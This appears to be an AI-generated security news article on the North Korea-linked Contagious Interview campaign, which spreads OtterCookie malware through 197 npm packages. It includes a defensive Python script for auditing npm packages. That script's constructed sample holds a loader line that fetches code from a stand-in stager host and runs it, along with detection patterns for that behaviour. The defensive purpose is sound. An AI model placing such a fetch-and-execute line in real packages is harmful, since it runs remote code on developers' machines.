Ethical Hacking News
The Contagious Interview campaign has expanded its malicious operations by distributing 197 new npm packages containing the OtterCookie malware. This comprehensive analysis delves into the campaign's infrastructure, tactics, and malware distribution methods, highlighting the growing threat landscape in the software development ecosystem.
Contagious Interview, a sophisticated and ongoing campaign linked to North Korea, has expanded its malicious operations by distributing 197 new npm packages containing the OtterCookie malware. This malware variant is designed to serve as an all-in-one infostealer and remote access tool, compromising systems by exploiting vulnerabilities in popular software development environments.
In November 2023, the Contagious Interview campaign began targeting software developers working on Windows, Linux, and macOS platforms, particularly those involved in crypto and Web3. Attackers employed social engineering tactics, including fake job interviews and Trojanized demo projects, to deliver malware-laden packages. These malicious npm packages were primarily used to spread the BeaverTail and OtterCookie infostealers, as well as InvisibleFerret RATs.
Since its inception, the campaign has demonstrated a systematic and factory-style operation, leveraging the npm ecosystem, GitHub, and Vercel as initial access channels. The attackers have developed a sophisticated infrastructure comprising multiple loader packages, a Vercel-hosted stager, and a threat actor-controlled GitHub account serving OtterCookie malware. This elaborate setup allows them to rotate payloads, customize attacks, and maintain low-level C2 activity until the second-stage malware launches.
The OtterCookie payload functions as an all-in-one infostealer and remote access tool. It first checks whether the victim is running in a VM or sandbox and fingerprints the system before contacting the C2 server. It then registers the machine, waits for tasks, and launches three modules in parallel. Together these modules steal clipboard data every few seconds, give attackers an interactive remote shell, add persistence on Windows, collect Chrome and Brave credentials, extract data from crypto-wallet extensions, log keystrokes, capture screenshots from all monitors, scan the entire filesystem for secrets, wallets, and sensitive documents, and upload everything to the C2 server. This comprehensive exploitation allows attackers to drain digital assets and loot high-value data from developer systems.
In mid-November, North Korea-linked actors behind the Contagious Interview campaign updated their tactics by using JSON storage services to host and deliver malware through trojanized code projects, according to a new NVISO report. The attackers have employed various techniques, including typosquatted GitHub repositories, cloned Knightsbridge DEX sites, and fake job assignments, to entice developers into installing compromised packages.
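The delivery chain described above (an npm loader package whose install step pulls a second stage from Vercel, GitHub, or a JSON storage service) is something a defender can check for at dependency-review time. The following triage script is an added example, not code from the article or from any of the reports it cites; the host names it looks for are generic hosting domains named in the article (not indicators of compromise), and the sample package it inspects is constructed for illustration.

```python
import json
import re

# Assumption: the staging platforms named in the article. These are ordinary
# hosting domains, so a hit means "review this package", not "malicious".
STAGING_HOSTS = ("vercel.app", "raw.githubusercontent.com", "github.com")
# npm lifecycle hooks that run automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
REMOTE_FETCH = re.compile(r"\b(fetch|axios|https?\.get|request)\s*\(")
DYNAMIC_EVAL = re.compile(r"\b(eval|new Function|vm\.runInThisContext)\s*\(")


def audit_package(package_json: str, sources: dict) -> list:
    """Return findings for one package.

    package_json: text of the package's package.json
    sources: {relative path: file text} for its JavaScript files
    """
    findings = []
    scripts = json.loads(package_json).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"lifecycle hook '{hook}' runs at install: {scripts[hook]}")
    for path, text in sources.items():
        hosts = [h for h in STAGING_HOSTS if h in text]
        fetches = REMOTE_FETCH.search(text) is not None
        if hosts and fetches:
            findings.append(f"{path}: fetches from external hosting {hosts}")
        # Remote fetch followed by dynamic evaluation catches second-stage
        # loaders regardless of which hosting service they pull from.
        if fetches and DYNAMIC_EVAL.search(text):
            findings.append(f"{path}: executes dynamically fetched code")
    return findings


# Constructed sample: a "demo project" package that mimics the loader pattern.
SAMPLE_MANIFEST = json.dumps({"name": "demo-project", "version": "1.0.0",
                              "scripts": {"postinstall": "node setup.js"}})
SAMPLE_SOURCES = {"setup.js": 'const r = await fetch("https://stager.vercel.app/c");\n'
                              "new Function(await r.text())();"}
# Constructed sample: a benign package with no install-time behaviour.
CLEAN_MANIFEST = json.dumps({"name": "pad", "scripts": {"test": "node test.js"}})
CLEAN_SOURCES = {"index.js": "module.exports = s => s.padStart(2);"}

if __name__ == "__main__":
    for finding in audit_package(SAMPLE_MANIFEST, SAMPLE_SOURCES):
        print("FLAG:", finding)
```

Run it against the contents of each directory under node_modules after an install (or against a cloned interview "assignment" before running it) to surface packages that deserve a manual look.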
The Contagious Interview campaign serves as a prime example of the growing threat landscape in the software development ecosystem. Its use of social engineering tactics, combined with its sophisticated infrastructure and malware distribution methods, poses significant risks to organizations operating in high-risk industries such as finance, healthcare, and government. It is essential for developers to remain vigilant and stay informed about emerging threats to protect their systems and data.
Related Information:
https://www.ethicalhackingnews.com/articles/The-OtterCookie-Malware-Saga-A-Comprehensive-Analysis-of-the-Contagious-Interview-Campaigns-Expansive-npm-Package-Distribution-ehn.shtml
https://securityaffairs.com/185170/apt/contagious-interview-campaign-expands-with-197-npm-ppackages-spreading-new-ottercookie-malware.html
https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages
https://attack.mitre.org/software/S1246/
https://malpedia.caad.fkie.fraunhofer.de/details/js.beavertail
https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/
https://attack.mitre.org/software/S1245/
https://any.run/cybersecurity-blog/ottercookie-malware-analysis/
https://thehackernews.com/2025/11/north-korean-hackers-deploy-197-npm.html
Published: Sat Nov 29 19:58:05 2025 by llama3.2 3B Q4_K_M